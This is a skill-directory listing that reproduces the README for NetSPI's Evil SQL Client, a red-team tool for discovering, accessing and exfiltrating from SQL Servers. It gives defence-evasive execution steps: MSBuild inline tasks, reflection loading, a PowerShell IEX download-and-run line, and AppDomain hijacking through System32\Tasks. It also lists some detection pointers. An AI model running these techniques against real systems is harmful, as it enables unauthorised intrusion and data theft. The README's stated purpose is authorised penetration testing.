SkillAgentSearch skills...

ESC

Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.

GenerateConvertImprove

Install / Use

/learn @NetSPI/ESC
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

evilsqlclient<br>

--------------------------<br> Evil SQL Client (ESC)<br> Version: v1.0 <Br> Author: Scott Sutherland (@_nullbind), NetSPI 2020<Br> <br> Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting Active Directory domain joined SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.<br>

Most of ESC's functionality is based on the PowerUpSQL, DAFT, SQLC2, and SQLInjectionWiki projects which are also related to SQL Server. At the moment ESC does not have full feature parity with the PowerUpSQL or DAFT, but the most useful bits are there.

Below is a summary of what is covered in this readme: <br><br> <strong>Execution Options</strong><br>

  • <a href="#compileexe">Compile source and run via exe</a>
  • <a href="#runexe">Download release and run via exe</a>
  • <a href="#runmsbuild">Download and run through MSBuild</a>
  • <a href="#runps">Download and run through PowerShell</a>
  • <a href="#runappdomain">Download and run through AppDomain Hijacking</a>

<strong>Command Options</strong><br>

  • <a href="#supportedcommands">Supported Commands (HELP)</a> <br>
  • <a href="#cmddiscovery">Discovery Command Examples</a> <br>
  • <a href="#cmdaccess">Access Check Command Examples</a> <br>
  • <a href="#targetone">Query Single Target</a> <br>
  • <a href="#targetmany">Query Multiple Targets</a> <br>
  • <a href="#cmdescalate">Privilege Escalation Command Examples</a> <br>
  • <a href="#cmdexfiltrate">Exfiltration Command Examples</a> <br>
  • <a href="#pendingcommands">Pending Commands</a> <br>

<strong>Detections</strong>

  • MSBuild Tests: Resource1
  • MSBuild Detection: Resource1 | Resource2
  • SQL Server Detection: Resource1
  • AppDomain Detection - Consider monitoring for tasks.dll being written to c:\Windows\SysWow64\Tasks\ and c:\Windows\System32\Tasks, affected files being copied out of system and program file directories, or the "APPDOMAIN_MANAGER_TYPE" and "COMPLUS_Version" environmental variables being set via the command line or via scripting engines. Disclaimer: I haven't tested the AppDomain detections on scale so I dont know how much white noise they will produce.

Execution Options <a name="exec">

Below is a list of options for running the Evil SQl Client (ESC).

Compile Source and Run Exe <a name="compileexe"></a>

  1. Download the source from esc folder.
  2. Open the esc.sln file in Visual Studio.
  3. Select Build -> Build Solution.
  4. Run esc.exe.

buildesc

Download Release and Run Exe <a name="runexe"></a>

  1. Download compiled esc.exe from releases.
  2. Run esc.exe.

runescexe

Download and Run through MSbuild.exe <a name="runmsbuild"></a>

Evil SQL Client console can be run through msbuild inline tasks using the esc.csproj file or esc.xml file.<br> Using msbuild.exe to execute .net code through inline tasks is a technique that was researched and popularized by Casey Smith.

<strong>esc.proj</strong><br> esc.proj includes all of the original Evil SQL Client (ESC) C Sharp source code inline. The inline .NET source code technique used in this variation seems to do a better job of avoiding detection than embedding the exe and calling through reflection.

<strong>esc.xml</strong><br> esc.xml works a little differently and has the entire esc.exe hardcoded as a string which is then loaded through reflection using a technique highlighted in the GhostBuild project by @bohops. I should note that Windows Defender is pretty good at identifying this exe wrapping technique out of the box.

Updating esc.xml:<br> To update the esc.xml follow the instructions below:

  1. Download and compile esc.exe.
  2. Run Out-Compressdll (by @mattifestation) against esc.exe.<br> Out-CompressedDll -FilePath esc.exe | out-file output.txt
  3. Replace the compressedBin string in esc.xml with the "EncodedCompressedFile" string generated from Out-CompressDll.
  4. Replace compressedBinSize with the size generated from Out-CompressDll.
  5. Run the script.<br> C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.xml

<strong>Execution Examples</strong><br> Below are a few execution examples. Msbuild can accept a filepath on the command line, but no filepath is required if only one .csproj file exists in the directory your executing msbuild.exe from.

In the examples below, esc.csproj has been renamed to 1.csproj: <br><br> C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <br> runescexe <br><br> C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.csproj <Br> C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.xml <br> runescexe

Download and Run Functions through PowerShell <a name="runps"></a>

Below are some quick instructions for running ESC functions through PowerShell.

  1. Download esc.exe.
  2. Open PowerShell and load esc.exe through reflection.<br> [System.Reflection.Assembly]::LoadFile("c:\temp\esc.exe")
  3. Alternatively, esc-example.ps1 contains a portable example generated using Out-Compressdll. It can be loaded using the PowerShell command below.<br> IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/ESC/master/esc-example.ps1")
  4. After the assmbly is loaded you can run the desired function. Examples below.
<pre> [evilsqlclient.Program+EvilCommands]::GetSQLServersBroadCast() [evilsqlclient.Program+EvilCommands]::GetSQLServersSpn() [evilsqlclient.Program+EvilCommands]::MasterDiscoveredList [evilsqlclient.Program+EvilCommands]::InstanceAllG = "enabled" [evilsqlclient.Program+EvilCommands]::CheckAccess() [evilsqlclient.Program+EvilCommands]::MasterAccessList [evilsqlclient.Program+EvilCommands]::CheckDefaultAppPw() [evilsqlclient.Program+EvilCommands]::CheckLoginAsPw() [evilsqlclient.Program+EvilCommands]::MasterAccessList </pre>

Download and Run through AppDomain Hijacking<a name="runappdomain"></a>

Application domains provide an isolation boundary for security, reliability, and versioning, and for unloading .NET assemblies. Application domains are typically created by runtime hosts, which are responsible for bootstrapping the common language runtime before an application is run. A typical application loads several assemblies into an application domain before the code they contain can be executed. The default AppDomainManager can be replaced by setting the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environmental variables. This provides users with the means load and execute .NET code from custom assemblies prior to the execution of the intended application, but within their process and thread.

Reference: https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains

It is possible to leverage that functionality and default write access to the c:\windows\system32\tasks\ directory to execute arbitrary .NET code through c:\windows\system32\ and c:\windows\SysWow64\ assemblies that import mscoree.dll. This technique was originally shared during Casey Smith's DerbyCon presentation ".Net Manifesto - Win Friends and Influence the Loader".

Below are instructions for executing ESC using this method.

  1. Compile esc-appdomain-hijack.cs to tasks.dll.
<pre> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.Reflection.dll /r:System.IO.Compression.dll /r:System.Runtime.InteropServices.dll /r:System.EnterpriseServices.dll /target:library /out:tasks.dll esc-appdomain-hijack.cs </pre>
  1. Update environment variables. Note: process, user, or system could be targeted.
<pre> set APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null set APPDOMAIN_MANAGER_TYPE=Esc set COMPLUS_Version=v4.0.30319 </pre>
  1. Copy tasks.dll to target directories.
<pre> copy tasks.dll C:\Windows\System32\Tasks\tasks.dll copy tasks.dll C:\Windows\SysWow64\Tasks\tasks.dll </pre>
  1. Identify .exe in c:\windows\system32\ that load mscoreee.dll. This can be done quickly using the Get-PE function from Matt Graeber's PowerShell Arsenal Project.
<pre> gci c:\windows\system32\*.exe | get-pe | where-object {$_.Imports.ModuleName -Contains "mscoree.dll"} | Select ModuleName -ExpandProperty modulename </pre>
  1. Choose one of the affected commands and run it.
<pre> Examples: C:\windows\system32\acu.exe C:\windows\system32\aitstatic.exe C:\windows

NetSPI

View profile

View on GitHub
GitHub Stars302
CategoryData
Updated15d ago
Forks44
NetSPI/ESC

Languages

C#

Security Score

80/100

Audited on Mar 11, 2026

No findings